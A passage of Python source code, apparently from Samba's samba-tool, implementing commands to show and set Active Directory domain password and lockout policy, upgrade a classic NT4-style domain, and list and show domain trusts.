"minPwdAge", "maxPwdAge", "lockoutDuration", "lockoutThreshold",
"lockOutObservationWindow"])
assert(len(res) == 1)
try:
pwd_props = int(res[0]["pwdProperties"][0])
pwd_hist_len = int(res[0]["pwdHistoryLength"][0])
cur_min_pwd_len = int(res[0]["minPwdLength"][0])
# ticks -> days
cur_min_pwd_age = timestamp_to_days(res[0]["minPwdAge"][0])
cur_max_pwd_age = timestamp_to_days(res[0]["maxPwdAge"][0])
cur_account_lockout_threshold = int(res[0]["lockoutThreshold"][0])
# ticks -> mins
cur_account_lockout_duration = timestamp_to_mins(res[0]["lockoutDuration"][0])
cur_reset_account_lockout_after = timestamp_to_mins(res[0]["lockOutObservationWindow"][0])
except Exception as e:
raise CommandError("Could not retrieve password properties!", e)
self.message("Password information for domain '%s'" % domain_dn)
self.message("")
if pwd_props & DOMAIN_PASSWORD_COMPLEX != 0:
self.message("Password complexity: on")
else:
self.message("Password complexity: off")
if pwd_props & DOMAIN_PASSWORD_STORE_CLEARTEXT != 0:
self.message("Store plaintext passwords: on")
else:
self.message("Store plaintext passwords: off")
self.message("Password history length: %d" % pwd_hist_len)
self.message("Minimum password length: %d" % cur_min_pwd_len)
self.message("Minimum password age (days): %d" % cur_min_pwd_age)
self.message("Maximum password age (days): %d" % cur_max_pwd_age)
self.message("Account lockout duration (mins): %d" % cur_account_lockout_duration)
self.message("Account lockout threshold (attempts): %d" % cur_account_lockout_threshold)
self.message("Reset account lockout after (mins): %d" % cur_reset_account_lockout_after)
class cmd_domain_passwordsettings_set(Command):
"""Set password settings.
Password complexity, password lockout policy, history length,
minimum password length, the minimum and maximum password age) on
a Samba AD DC server.
Use against a Windows DC is possible, but group policy will override it.
"""
synopsis = "%prog <options> [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"versionopts": options.VersionOptions,
"credopts": options.CredentialsOptions,
}
takes_options = [
Option("-H", "--URL", help="LDB URL for database or target server", type=str,
metavar="URL", dest="H"),
Option("-q", "--quiet", help="Be quiet", action="store_true"), # unused
Option("--complexity", type="choice", choices=["on", "off", "default"],
help="The password complexity (on | off | default). Default is 'on'"),
Option("--store-plaintext", type="choice", choices=["on", "off", "default"],
help="Store plaintext passwords where account have 'store passwords with reversible encryption' set (on | off | default). Default is 'off'"),
Option("--history-length",
help="The password history length (<integer> | default). Default is 24.", type=str),
Option("--min-pwd-length",
help="The minimum password length (<integer> | default). Default is 7.", type=str),
Option("--min-pwd-age",
help="The minimum password age (<integer in days> | default). Default is 1.", type=str),
Option("--max-pwd-age",
help="The maximum password age (<integer in days> | default). Default is 43.", type=str),
Option("--account-lockout-duration",
help="The the length of time an account is locked out after exeeding the limit on bad password attempts (<integer in mins> | default). Default is 30 mins.", type=str),
Option("--account-lockout-threshold",
help="The number of bad password attempts allowed before locking out the account (<integer> | default). Default is 0 (never lock out).", type=str),
Option("--reset-account-lockout-after",
help="After this time is elapsed, the recorded number of attempts restarts from zero (<integer> | default). Default is 30.", type=str),
]
def run(self, H=None, min_pwd_age=None, max_pwd_age=None,
quiet=False, complexity=None, store_plaintext=None, history_length=None,
min_pwd_length=None, account_lockout_duration=None, account_lockout_threshold=None,
reset_account_lockout_after=None, credopts=None, sambaopts=None,
versionopts=None):
lp = sambaopts.get_loadparm()
creds = credopts.get_credentials(lp)
samdb = SamDB(url=H, session_info=system_session(),
credentials=creds, lp=lp)
domain_dn = samdb.domain_dn()
msgs = []
m = ldb.Message()
m.dn = ldb.Dn(samdb, domain_dn)
pwd_props = int(samdb.get_pwdProperties())
# get the current password age settings
max_pwd_age_ticks = samdb.get_maxPwdAge()
min_pwd_age_ticks = samdb.get_minPwdAge()
if complexity is not None:
if complexity == "on" or complexity == "default":
pwd_props = pwd_props | DOMAIN_PASSWORD_COMPLEX
msgs.append("Password complexity activated!")
elif complexity == "off":
pwd_props = pwd_props & (~DOMAIN_PASSWORD_COMPLEX)
msgs.append("Password complexity deactivated!")
if store_plaintext is not None:
if store_plaintext == "on" or store_plaintext == "default":
pwd_props = pwd_props | DOMAIN_PASSWORD_STORE_CLEARTEXT
msgs.append("Plaintext password storage for changed passwords activated!")
elif store_plaintext == "off":
pwd_props = pwd_props & (~DOMAIN_PASSWORD_STORE_CLEARTEXT)
msgs.append("Plaintext password storage for changed passwords deactivated!")
if complexity is not None or store_plaintext is not None:
m["pwdProperties"] = ldb.MessageElement(str(pwd_props),
ldb.FLAG_MOD_REPLACE, "pwdProperties")
if history_length is not None:
if history_length == "default":
pwd_hist_len = 24
else:
pwd_hist_len = int(history_length)
if pwd_hist_len < 0 or pwd_hist_len > 24:
raise CommandError("Password history length must be in the range of 0 to 24!")
m["pwdHistoryLength"] = ldb.MessageElement(str(pwd_hist_len),
ldb.FLAG_MOD_REPLACE, "pwdHistoryLength")
msgs.append("Password history length changed!")
if min_pwd_length is not None:
if min_pwd_length == "default":
min_pwd_len = 7
else:
min_pwd_len = int(min_pwd_length)
if min_pwd_len < 0 or min_pwd_len > 14:
raise CommandError("Minimum password length must be in the range of 0 to 14!")
m["minPwdLength"] = ldb.MessageElement(str(min_pwd_len),
ldb.FLAG_MOD_REPLACE, "minPwdLength")
msgs.append("Minimum password length changed!")
if min_pwd_age is not None:
if min_pwd_age == "default":
min_pwd_age = 1
else:
min_pwd_age = int(min_pwd_age)
if min_pwd_age < 0 or min_pwd_age > 998:
raise CommandError("Minimum password age must be in the range of 0 to 998!")
# days -> ticks
min_pwd_age_ticks = -int(min_pwd_age * (24 * 60 * 60 * 1e7))
m["minPwdAge"] = ldb.MessageElement(str(min_pwd_age_ticks),
ldb.FLAG_MOD_REPLACE, "minPwdAge")
msgs.append("Minimum password age changed!")
if max_pwd_age is not None:
if max_pwd_age == "default":
max_pwd_age = 43
else:
max_pwd_age = int(max_pwd_age)
if max_pwd_age < 0 or max_pwd_age > 999:
raise CommandError("Maximum password age must be in the range of 0 to 999!")
# days -> ticks
if max_pwd_age == 0:
max_pwd_age_ticks = NEVER_TIMESTAMP
else:
max_pwd_age_ticks = -int(max_pwd_age * (24 * 60 * 60 * 1e7))
m["maxPwdAge"] = ldb.MessageElement(str(max_pwd_age_ticks),
ldb.FLAG_MOD_REPLACE, "maxPwdAge")
msgs.append("Maximum password age changed!")
if account_lockout_duration is not None:
if account_lockout_duration == "default":
account_lockout_duration = 30
else:
account_lockout_duration = int(account_lockout_duration)
if account_lockout_duration < 0 or account_lockout_duration > 99999:
raise CommandError("Maximum password age must be in the range of 0 to 99999!")
# minutes -> ticks
if account_lockout_duration == 0:
account_lockout_duration_ticks = NEVER_TIMESTAMP
else:
account_lockout_duration_ticks = -int(account_lockout_duration * (60 * 1e7))
m["lockoutDuration"] = ldb.MessageElement(str(account_lockout_duration_ticks),
ldb.FLAG_MOD_REPLACE, "lockoutDuration")
msgs.append("Account lockout duration changed!")
if account_lockout_threshold is not None:
if account_lockout_threshold == "default":
account_lockout_threshold = 0
else:
account_lockout_threshold = int(account_lockout_threshold)
m["lockoutThreshold"] = ldb.MessageElement(str(account_lockout_threshold),
ldb.FLAG_MOD_REPLACE, "lockoutThreshold")
msgs.append("Account lockout threshold changed!")
if reset_account_lockout_after is not None:
if reset_account_lockout_after == "default":
reset_account_lockout_after = 30
else:
reset_account_lockout_after = int(reset_account_lockout_after)
if reset_account_lockout_after < 0 or reset_account_lockout_after > 99999:
raise CommandError("Maximum password age must be in the range of 0 to 99999!")
# minutes -> ticks
if reset_account_lockout_after == 0:
reset_account_lockout_after_ticks = NEVER_TIMESTAMP
else:
reset_account_lockout_after_ticks = -int(reset_account_lockout_after * (60 * 1e7))
m["lockOutObservationWindow"] = ldb.MessageElement(str(reset_account_lockout_after_ticks),
ldb.FLAG_MOD_REPLACE, "lockOutObservationWindow")
msgs.append("Duration to reset account lockout after changed!")
if max_pwd_age or min_pwd_age:
# If we're setting either min or max password, make sure the max is
# still greater overall. As either setting could be None, we use the
# ticks here (which are always set) and work backwards.
max_pwd_age = timestamp_to_days(max_pwd_age_ticks)
min_pwd_age = timestamp_to_days(min_pwd_age_ticks)
if max_pwd_age != 0 and min_pwd_age >= max_pwd_age:
raise CommandError("Maximum password age (%d) must be greater than minimum password age (%d)!" % (max_pwd_age, min_pwd_age))
if len(m) == 0:
raise CommandError("You must specify at least one option to set. Try --help")
samdb.modify(m)
msgs.append("All changes applied successfully!")
self.message("\n".join(msgs))
class cmd_domain_passwordsettings(SuperCommand):
"""Manage password policy settings."""
subcommands = {}
subcommands["pso"] = cmd_domain_passwordsettings_pso()
subcommands["show"] = cmd_domain_passwordsettings_show()
subcommands["set"] = cmd_domain_passwordsettings_set()
class cmd_domain_classicupgrade(Command):
"""Upgrade from Samba classic (NT4-like) database to Samba AD DC database.
Specify either a directory with all Samba classic DC databases and state files (with --dbdir) or
the testparm utility from your classic installation (with --testparm).
"""
synopsis = "%prog [options] <classic_smb_conf>"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"versionopts": options.VersionOptions
}
takes_options = [
Option("--dbdir", type="string", metavar="DIR",
help="Path to samba classic DC database directory"),
Option("--testparm", type="string", metavar="PATH",
help="Path to samba classic DC testparm utility from the previous installation. This allows the default paths of the previous installation to be followed"),
Option("--targetdir", type="string", metavar="DIR",
help="Path prefix where the new Samba 4.0 AD domain should be initialised"),
Option("-q", "--quiet", help="Be quiet", action="store_true"),
Option("-v", "--verbose", help="Be verbose", action="store_true"),
Option("--dns-backend", type="choice", metavar="NAMESERVER-BACKEND",
choices=["SAMBA_INTERNAL", "BIND9_FLATFILE", "BIND9_DLZ", "NONE"],
help="The DNS server backend. SAMBA_INTERNAL is the builtin name server (default), "
"BIND9_FLATFILE uses bind9 text database to store zone information, "
"BIND9_DLZ uses samba4 AD to store zone information, "
"NONE skips the DNS setup entirely (this DC will not be a DNS server)",
default="SAMBA_INTERNAL")
]
ntvfs_options = [
Option("--use-xattrs", type="choice", choices=["yes", "no", "auto"],
metavar="[yes|no|auto]",
help="Define if we should use the native fs capabilities or a tdb file for "
"storing attributes likes ntacl when --use-ntvfs is set. "
"auto tries to make an inteligent guess based on the user rights and system capabilities",
default="auto")
]
if samba.is_ntvfs_fileserver_built():
takes_options.extend(common_ntvfs_options)
takes_options.extend(ntvfs_options)
takes_args = ["smbconf"]
def run(self, smbconf=None, targetdir=None, dbdir=None, testparm=None,
quiet=False, verbose=False, use_xattrs="auto", sambaopts=None, versionopts=None,
dns_backend=None, use_ntvfs=False):
if not os.path.exists(smbconf):
raise CommandError("File %s does not exist" % smbconf)
if testparm and not os.path.exists(testparm):
raise CommandError("Testparm utility %s does not exist" % testparm)
if dbdir and not os.path.exists(dbdir):
raise CommandError("Directory %s does not exist" % dbdir)
if not dbdir and not testparm:
raise CommandError("Please specify either dbdir or testparm")
logger = self.get_logger(verbose=verbose, quiet=quiet)
if dbdir and testparm:
logger.warning("both dbdir and testparm specified, ignoring dbdir.")
dbdir = None
lp = sambaopts.get_loadparm()
s3conf = s3param.get_context()
if sambaopts.realm:
s3conf.set("realm", sambaopts.realm)
if targetdir is not None:
if not os.path.isdir(targetdir):
os.mkdir(targetdir)
eadb = True
if use_xattrs == "yes":
eadb = False
elif use_xattrs == "auto" and use_ntvfs == False:
eadb = False
elif use_ntvfs == False:
raise CommandError("--use-xattrs=no requires --use-ntvfs (not supported for production use). "
"Please re-run with --use-xattrs omitted.")
elif use_xattrs == "auto" and not s3conf.get("posix:eadb"):
if targetdir:
tmpfile = tempfile.NamedTemporaryFile(dir=os.path.abspath(targetdir))
else:
tmpfile = tempfile.NamedTemporaryFile(dir=os.path.abspath(os.path.dirname(lp.get("private dir"))))
try:
try:
samba.ntacls.setntacl(lp, tmpfile.name,
"O:S-1-5-32G:S-1-5-32",
"S-1-5-32",
system_session_unix(),
"native")
eadb = False
except Exception:
# FIXME: Don't catch all exceptions here
logger.info("You are not root or your system does not support xattr, using tdb backend for attributes. "
"If you intend to use this provision in production, rerun the script as root on a system supporting xattrs.")
finally:
tmpfile.close()
# Set correct default values from dbdir or testparm
paths = {}
if dbdir:
paths["state directory"] = dbdir
paths["private dir"] = dbdir
paths["lock directory"] = dbdir
paths["smb passwd file"] = dbdir + "/smbpasswd"
else:
paths["state directory"] = get_testparm_var(testparm, smbconf, "state directory")
paths["private dir"] = get_testparm_var(testparm, smbconf, "private dir")
paths["smb passwd file"] = get_testparm_var(testparm, smbconf, "smb passwd file")
paths["lock directory"] = get_testparm_var(testparm, smbconf, "lock directory")
# "testparm" from Samba 3 < 3.4.x is not aware of the parameter
# "state directory", instead make use of "lock directory"
if len(paths["state directory"]) == 0:
paths["state directory"] = paths["lock directory"]
for p in paths:
s3conf.set(p, paths[p])
# load smb.conf parameters
logger.info("Reading smb.conf")
s3conf.load(smbconf)
samba3 = Samba3(smbconf, s3conf)
logger.info("Provisioning")
upgrade_from_samba3(samba3, logger, targetdir, session_info=system_session(),
useeadb=eadb, dns_backend=dns_backend, use_ntvfs=use_ntvfs)
class cmd_domain_samba3upgrade(cmd_domain_classicupgrade):
__doc__ = cmd_domain_classicupgrade.__doc__
# This command is present for backwards compatibility only,
# and should not be shown.
hidden = True
class LocalDCCredentialsOptions(options.CredentialsOptions):
def __init__(self, parser):
options.CredentialsOptions.__init__(self, parser, special_name="local-dc")
class DomainTrustCommand(Command):
"""List domain trusts."""
def __init__(self):
Command.__init__(self)
self.local_lp = None
self.local_server = None
self.local_binding_string = None
self.local_creds = None
self.remote_server = None
self.remote_binding_string = None
self.remote_creds = None
def _uint32(self, v):
return ctypes.c_uint32(v).value
def check_runtime_error(self, runtime, val):
if runtime is None:
return False
err32 = self._uint32(runtime.args[0])
if err32 == val:
return True
return False
class LocalRuntimeError(CommandError):
def __init__(exception_self, self, runtime, message):
err32 = self._uint32(runtime.args[0])
errstr = runtime.args[1]
msg = "LOCAL_DC[%s]: %s - ERROR(0x%08X) - %s" % (
self.local_server, message, err32, errstr)
CommandError.__init__(exception_self, msg)
class RemoteRuntimeError(CommandError):
def __init__(exception_self, self, runtime, message):
err32 = self._uint32(runtime.args[0])
errstr = runtime.args[1]
msg = "REMOTE_DC[%s]: %s - ERROR(0x%08X) - %s" % (
self.remote_server, message, err32, errstr)
CommandError.__init__(exception_self, msg)
class LocalLdbError(CommandError):
def __init__(exception_self, self, ldb_error, message):
errval = ldb_error.args[0]
errstr = ldb_error.args[1]
msg = "LOCAL_DC[%s]: %s - ERROR(%d) - %s" % (
self.local_server, message, errval, errstr)
CommandError.__init__(exception_self, msg)
def setup_local_server(self, sambaopts, localdcopts):
if self.local_server is not None:
return self.local_server
lp = sambaopts.get_loadparm()
local_server = localdcopts.ipaddress
if local_server is None:
server_role = lp.server_role()
if server_role != "ROLE_ACTIVE_DIRECTORY_DC":
raise CommandError("Invalid server_role %s" % (server_role))
local_server = lp.get('netbios name')
local_transport = "ncalrpc"
local_binding_options = ""
local_binding_options += ",auth_type=ncalrpc_as_system"
local_ldap_url = None
local_creds = None
else:
local_transport = "ncacn_np"
local_binding_options = ""
local_ldap_url = "ldap://%s" % local_server
local_creds = localdcopts.get_credentials(lp)
self.local_lp = lp
self.local_server = local_server
self.local_binding_string = "%s:%s[%s]" % (local_transport, local_server, local_binding_options)
self.local_ldap_url = local_ldap_url
self.local_creds = local_creds
return self.local_server
def new_local_lsa_connection(self):
return lsa.lsarpc(self.local_binding_string, self.local_lp, self.local_creds)
def new_local_netlogon_connection(self):
return netlogon.netlogon(self.local_binding_string, self.local_lp, self.local_creds)
def new_local_ldap_connection(self):
return SamDB(url=self.local_ldap_url,
session_info=system_session(),
credentials=self.local_creds,
lp=self.local_lp)
def setup_remote_server(self, credopts, domain,
require_pdc=True,
require_writable=True):
if require_pdc:
assert require_writable
if self.remote_server is not None:
return self.remote_server
self.remote_server = "__unknown__remote_server__.%s" % domain
assert self.local_server is not None
remote_creds = credopts.get_credentials(self.local_lp)
remote_server = credopts.ipaddress
remote_binding_options = ""
# TODO: we should also support NT4 domains
# we could use local_netlogon.netr_DsRGetDCNameEx2() with the remote domain name
# and delegate NBT or CLDAP to the local netlogon server
try:
remote_net = Net(remote_creds, self.local_lp, server=remote_server)
remote_flags = nbt.NBT_SERVER_LDAP | nbt.NBT_SERVER_DS
if require_writable:
remote_flags |= nbt.NBT_SERVER_WRITABLE
if require_pdc:
remote_flags |= nbt.NBT_SERVER_PDC
remote_info = remote_net.finddc(flags=remote_flags, domain=domain, address=remote_server)
except NTSTATUSError as error:
raise CommandError("Failed to find a writeable DC for domain '%s': %s" %
(domain, error.args[1]))
except Exception:
raise CommandError("Failed to find a writeable DC for domain '%s'" % domain)
flag_map = {
nbt.NBT_SERVER_PDC: "PDC",
nbt.NBT_SERVER_GC: "GC",
nbt.NBT_SERVER_LDAP: "LDAP",
nbt.NBT_SERVER_DS: "DS",
nbt.NBT_SERVER_KDC: "KDC",
nbt.NBT_SERVER_TIMESERV: "TIMESERV",
nbt.NBT_SERVER_CLOSEST: "CLOSEST",
nbt.NBT_SERVER_WRITABLE: "WRITABLE",
nbt.NBT_SERVER_GOOD_TIMESERV: "GOOD_TIMESERV",
nbt.NBT_SERVER_NDNC: "NDNC",
nbt.NBT_SERVER_SELECT_SECRET_DOMAIN_6: "SELECT_SECRET_DOMAIN_6",
nbt.NBT_SERVER_FULL_SECRET_DOMAIN_6: "FULL_SECRET_DOMAIN_6",
nbt.NBT_SERVER_ADS_WEB_SERVICE: "ADS_WEB_SERVICE",
nbt.NBT_SERVER_DS_8: "DS_8",
nbt.NBT_SERVER_HAS_DNS_NAME: "HAS_DNS_NAME",
nbt.NBT_SERVER_IS_DEFAULT_NC: "IS_DEFAULT_NC",
nbt.NBT_SERVER_FOREST_ROOT: "FOREST_ROOT",
}
server_type_string = self.generic_bitmap_to_string(flag_map,
remote_info.server_type, names_only=True)
self.outf.write("RemoteDC Netbios[%s] DNS[%s] ServerType[%s]\n" % (
remote_info.pdc_name,
remote_info.pdc_dns_name,
server_type_string))
self.remote_server = remote_info.pdc_dns_name
self.remote_binding_string = "ncacn_np:%s[%s]" % (self.remote_server, remote_binding_options)
self.remote_creds = remote_creds
return self.remote_server
def new_remote_lsa_connection(self):
return lsa.lsarpc(self.remote_binding_string, self.local_lp, self.remote_creds)
def new_remote_netlogon_connection(self):
return netlogon.netlogon(self.remote_binding_string, self.local_lp, self.remote_creds)
def get_lsa_info(self, conn, policy_access):
objectAttr = lsa.ObjectAttribute()
objectAttr.sec_qos = lsa.QosInfo()
policy = conn.OpenPolicy2(b''.decode('utf-8'),
objectAttr, policy_access)
info = conn.QueryInfoPolicy2(policy, lsa.LSA_POLICY_INFO_DNS)
return (policy, info)
def get_netlogon_dc_unc(self, conn, server, domain):
try:
info = conn.netr_DsRGetDCNameEx2(server,
None, 0, None, None, None,
netlogon.DS_RETURN_DNS_NAME)
return info.dc_unc
except RuntimeError:
return conn.netr_GetDcName(server, domain)
def get_netlogon_dc_info(self, conn, server):
info = conn.netr_DsRGetDCNameEx2(server,
None, 0, None, None, None,
netlogon.DS_RETURN_DNS_NAME)
return info
def netr_DomainTrust_to_name(self, t):
if t.trust_type == lsa.LSA_TRUST_TYPE_DOWNLEVEL:
return t.netbios_name
return t.dns_name
def netr_DomainTrust_to_type(self, a, t):
primary = None
primary_parent = None
for _t in a:
if _t.trust_flags & netlogon.NETR_TRUST_FLAG_PRIMARY:
primary = _t
if not _t.trust_flags & netlogon.NETR_TRUST_FLAG_TREEROOT:
primary_parent = a[_t.parent_index]
break
if t.trust_flags & netlogon.NETR_TRUST_FLAG_IN_FOREST:
if t is primary_parent:
return "Parent"
if t.trust_flags & netlogon.NETR_TRUST_FLAG_TREEROOT:
return "TreeRoot"
parent = a[t.parent_index]
if parent is primary:
return "Child"
return "Shortcut"
if t.trust_attributes & lsa.LSA_TRUST_ATTRIBUTE_FOREST_TRANSITIVE:
return "Forest"
return "External"
def netr_DomainTrust_to_transitive(self, t):
if t.trust_flags & netlogon.NETR_TRUST_FLAG_IN_FOREST:
return "Yes"
if t.trust_attributes & lsa.LSA_TRUST_ATTRIBUTE_NON_TRANSITIVE:
return "No"
if t.trust_attributes & lsa.LSA_TRUST_ATTRIBUTE_FOREST_TRANSITIVE:
return "Yes"
return "No"
def netr_DomainTrust_to_direction(self, t):
if t.trust_flags & netlogon.NETR_TRUST_FLAG_INBOUND and \
t.trust_flags & netlogon.NETR_TRUST_FLAG_OUTBOUND:
return "BOTH"
if t.trust_flags & netlogon.NETR_TRUST_FLAG_INBOUND:
return "INCOMING"
if t.trust_flags & netlogon.NETR_TRUST_FLAG_OUTBOUND:
return "OUTGOING"
return "INVALID"
def generic_enum_to_string(self, e_dict, v, names_only=False):
try:
w = e_dict[v]
except KeyError:
v32 = self._uint32(v)
w = "__unknown__%08X__" % v32
r = "0x%x (%s)" % (v, w)
return r
def generic_bitmap_to_string(self, b_dict, v, names_only=False):
s = []
c = v
for b in sorted(b_dict.keys()):
if not (c & b):
continue
c &= ~b
s += [b_dict[b]]
if c != 0:
c32 = self._uint32(c)
s += ["__unknown_%08X__" % c32]
w = ",".join(s)
if names_only:
return w
r = "0x%x (%s)" % (v, w)
return r
def trustType_string(self, v):
types = {
lsa.LSA_TRUST_TYPE_DOWNLEVEL: "DOWNLEVEL",
lsa.LSA_TRUST_TYPE_UPLEVEL: "UPLEVEL",
lsa.LSA_TRUST_TYPE_MIT: "MIT",
lsa.LSA_TRUST_TYPE_DCE: "DCE",
}
return self.generic_enum_to_string(types, v)
def trustDirection_string(self, v):
directions = {
lsa.LSA_TRUST_DIRECTION_INBOUND |
lsa.LSA_TRUST_DIRECTION_OUTBOUND: "BOTH",
lsa.LSA_TRUST_DIRECTION_INBOUND: "INBOUND",
lsa.LSA_TRUST_DIRECTION_OUTBOUND: "OUTBOUND",
}
return self.generic_enum_to_string(directions, v)
def trustAttributes_string(self, v):
attributes = {
lsa.LSA_TRUST_ATTRIBUTE_NON_TRANSITIVE: "NON_TRANSITIVE",
lsa.LSA_TRUST_ATTRIBUTE_UPLEVEL_ONLY: "UPLEVEL_ONLY",
lsa.LSA_TRUST_ATTRIBUTE_QUARANTINED_DOMAIN: "QUARANTINED_DOMAIN",
lsa.LSA_TRUST_ATTRIBUTE_FOREST_TRANSITIVE: "FOREST_TRANSITIVE",
lsa.LSA_TRUST_ATTRIBUTE_CROSS_ORGANIZATION: "CROSS_ORGANIZATION",
lsa.LSA_TRUST_ATTRIBUTE_WITHIN_FOREST: "WITHIN_FOREST",
lsa.LSA_TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL: "TREAT_AS_EXTERNAL",
lsa.LSA_TRUST_ATTRIBUTE_USES_RC4_ENCRYPTION: "USES_RC4_ENCRYPTION",
}
return self.generic_bitmap_to_string(attributes, v)
def kerb_EncTypes_string(self, v):
enctypes = {
security.KERB_ENCTYPE_DES_CBC_CRC: "DES_CBC_CRC",
security.KERB_ENCTYPE_DES_CBC_MD5: "DES_CBC_MD5",
security.KERB_ENCTYPE_RC4_HMAC_MD5: "RC4_HMAC_MD5",
security.KERB_ENCTYPE_AES128_CTS_HMAC_SHA1_96: "AES128_CTS_HMAC_SHA1_96",
security.KERB_ENCTYPE_AES256_CTS_HMAC_SHA1_96: "AES256_CTS_HMAC_SHA1_96",
security.KERB_ENCTYPE_FAST_SUPPORTED: "FAST_SUPPORTED",
security.KERB_ENCTYPE_COMPOUND_IDENTITY_SUPPORTED: "COMPOUND_IDENTITY_SUPPORTED",
security.KERB_ENCTYPE_CLAIMS_SUPPORTED: "CLAIMS_SUPPORTED",
security.KERB_ENCTYPE_RESOURCE_SID_COMPRESSION_DISABLED: "RESOURCE_SID_COMPRESSION_DISABLED",
}
return self.generic_bitmap_to_string(enctypes, v)
def entry_tln_status(self, e_flags, ):
if e_flags == 0:
return "Status[Enabled]"
flags = {
lsa.LSA_TLN_DISABLED_NEW: "Disabled-New",
lsa.LSA_TLN_DISABLED_ADMIN: "Disabled",
lsa.LSA_TLN_DISABLED_CONFLICT: "Disabled-Conflicting",
}
return "Status[%s]" % self.generic_bitmap_to_string(flags, e_flags, names_only=True)
def entry_dom_status(self, e_flags):
if e_flags == 0:
return "Status[Enabled]"
flags = {
lsa.LSA_SID_DISABLED_ADMIN: "Disabled-SID",
lsa.LSA_SID_DISABLED_CONFLICT: "Disabled-SID-Conflicting",
lsa.LSA_NB_DISABLED_ADMIN: "Disabled-NB",
lsa.LSA_NB_DISABLED_CONFLICT: "Disabled-NB-Conflicting",
}
return "Status[%s]" % self.generic_bitmap_to_string(flags, e_flags, names_only=True)
def write_forest_trust_info(self, fti, tln=None, collisions=None):
if tln is not None:
tln_string = " TDO[%s]" % tln
else:
tln_string = ""
self.outf.write("Namespaces[%d]%s:\n" % (
len(fti.entries), tln_string))
for i, e in enumerate(fti.entries):
flags = e.flags
collision_string = ""
if collisions is not None:
for c in collisions.entries:
if c.index != i:
continue
flags = c.flags
collision_string = " Collision[%s]" % (c.name.string)
d = e.forest_trust_data
if e.type == lsa.LSA_FOREST_TRUST_TOP_LEVEL_NAME:
self.outf.write("TLN: %-32s DNS[*.%s]%s\n" % (
self.entry_tln_status(flags),
d.string, collision_string))
elif e.type == lsa.LSA_FOREST_TRUST_TOP_LEVEL_NAME_EX:
self.outf.write("TLN_EX: %-29s DNS[*.%s]\n" % (
"", d.string))
elif e.type == lsa.LSA_FOREST_TRUST_DOMAIN_INFO:
self.outf.write("DOM: %-32s DNS[%s] Netbios[%s] SID[%s]%s\n" % (
self.entry_dom_status(flags),
d.dns_domain_name.string,
d.netbios_domain_name.string,
d.domain_sid, collision_string))
return
class cmd_domain_trust_list(DomainTrustCommand):
"""List domain trusts."""
synopsis = "%prog [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"versionopts": options.VersionOptions,
"localdcopts": LocalDCCredentialsOptions,
}
takes_options = [
]
def run(self, sambaopts=None, versionopts=None, localdcopts=None):
local_server = self.setup_local_server(sambaopts, localdcopts)
try:
local_netlogon = self.new_local_netlogon_connection()
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to connect netlogon server")
try:
local_netlogon_trusts = \
local_netlogon.netr_DsrEnumerateDomainTrusts(local_server,
netlogon.NETR_TRUST_FLAG_IN_FOREST |
netlogon.NETR_TRUST_FLAG_OUTBOUND |
netlogon.NETR_TRUST_FLAG_INBOUND)
except RuntimeError as error:
if self.check_runtime_error(error, werror.WERR_RPC_S_PROCNUM_OUT_OF_RANGE):
# TODO: we could implement a fallback to lsa.EnumTrustDom()
raise CommandError("LOCAL_DC[%s]: netr_DsrEnumerateDomainTrusts not supported." % (
self.local_server))
raise self.LocalRuntimeError(self, error, "netr_DsrEnumerateDomainTrusts failed")
a = local_netlogon_trusts.array
for t in a:
if t.trust_flags & netlogon.NETR_TRUST_FLAG_PRIMARY:
continue
self.outf.write("%-14s %-15s %-19s %s\n" % (
"Type[%s]" % self.netr_DomainTrust_to_type(a, t),
"Transitive[%s]" % self.netr_DomainTrust_to_transitive(t),
"Direction[%s]" % self.netr_DomainTrust_to_direction(t),
"Name[%s]" % self.netr_DomainTrust_to_name(t)))
return
class cmd_domain_trust_show(DomainTrustCommand):
"""Show trusted domain details."""
synopsis = "%prog NAME [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"versionopts": options.VersionOptions,
"localdcopts": LocalDCCredentialsOptions,
}
takes_options = [
]
takes_args = ["domain"]
def run(self, domain, sambaopts=None, versionopts=None, localdcopts=None):
local_server = self.setup_local_server(sambaopts, localdcopts)
try:
local_lsa = self.new_local_lsa_connection()
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to connect lsa server")
try:
local_policy_access = lsa.LSA_POLICY_VIEW_LOCAL_INFORMATION
(local_policy, local_lsa_info) = self.get_lsa_info(local_lsa, local_policy_access)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to query LSA_POLICY_INFO_DNS")
self.outf.write("LocalDomain Netbios[%s] DNS[%s] SID[%s]\n" % (
local_lsa_info.name.string,
local_lsa_info.dns_domain.string,
local_lsa_info.sid))
lsaString = lsa.String()
lsaString.string = domain
try:
local_tdo_full = \
local_lsa.QueryTrustedDomainInfoByName(local_policy,
lsaString,
lsa.LSA_TRUSTED_DOMAIN_INFO_FULL_INFO)
local_tdo_info = local_tdo_full.info_ex
local_tdo_posix = local_tdo_full.posix_offset
except NTSTATUSError as error:
if self.check_runtime_error(error, ntstatus.NT_STATUS_OBJECT_NAME_NOT_FOUND):
raise CommandError("trusted domain object does not exist for domain [%s]" % domain)
raise self.LocalRuntimeError(self, error, "QueryTrustedDomainInfoByName(FULL_INFO) failed")
try:
local_tdo_enctypes = \
local_lsa.QueryTrustedDomainInfoByName(local_policy,
lsaString,
lsa.LSA_TRUSTED_DOMAIN_SUPPORTED_ENCRYPTION_TYPES)
except NTSTATUSError as error:
if self.check_runtime_error(error, ntstatus.NT_STATUS_INVALID_PARAMETER):
error = None
if self.check_runtime_error(error, ntstatus.NT_STATUS_INVALID_INFO_CLASS):
error = None
if error is not None:
raise self.LocalRuntimeError(self, error,
"QueryTrustedDomainInfoByName(SUPPORTED_ENCRYPTION_TYPES) failed")
local_tdo_enctypes = lsa.TrustDomainInfoSupportedEncTypes()
local_tdo_enctypes.enc_types = 0
try:
local_tdo_forest = None
if local_tdo_info.trust_attributes & lsa.LSA_TRUST_ATTRIBUTE_FOREST_TRANSITIVE:
local_tdo_forest = \
local_lsa.lsaRQueryForestTrustInformation(local_policy,
lsaString,
lsa.LSA_FOREST_TRUST_DOMAIN_INFO)
except RuntimeError as error:
if self.check_runtime_error(error, ntstatus.NT_STATUS_RPC_PROCNUM_OUT_OF_RANGE):
error = None
if self.check_runtime_error(error, ntstatus.NT_STATUS_NOT_FOUND):
error = None
if error is not None:
